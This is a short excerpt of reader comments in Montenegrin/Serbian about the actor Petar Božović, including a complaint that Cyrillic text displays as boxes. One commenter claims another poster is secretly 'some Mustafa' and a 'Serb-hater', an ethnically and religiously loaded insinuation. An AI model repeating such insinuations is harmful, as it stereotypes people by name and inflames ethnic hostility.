  Нека Те, Божовићу ђе и досад, стрпи се докле проради Град театар у Будву а онда ћу Те гледат ђе Ти више приличи, у кафану на мукте!

 12. 16
  Dragan Dragović

  Prvo da pitam, zašto ne mogu da pišem ćirilicom, nego mi izlaze neki pravougaonici? Drugo, o Petru Božoviću od uvek imam vrhunsko mišljenje, a ovim komentarom ga je pečatirao. Još samo da kažem, ne mogu da prećutim, komentar ovog, nekog, čiji je potpis kaobajagi Zoran, a iza njega mislim da stoji neki Mustafa, je ogorčeni srbomrzac, samo kamufliran kao Zoran.

+ Ostavite komentar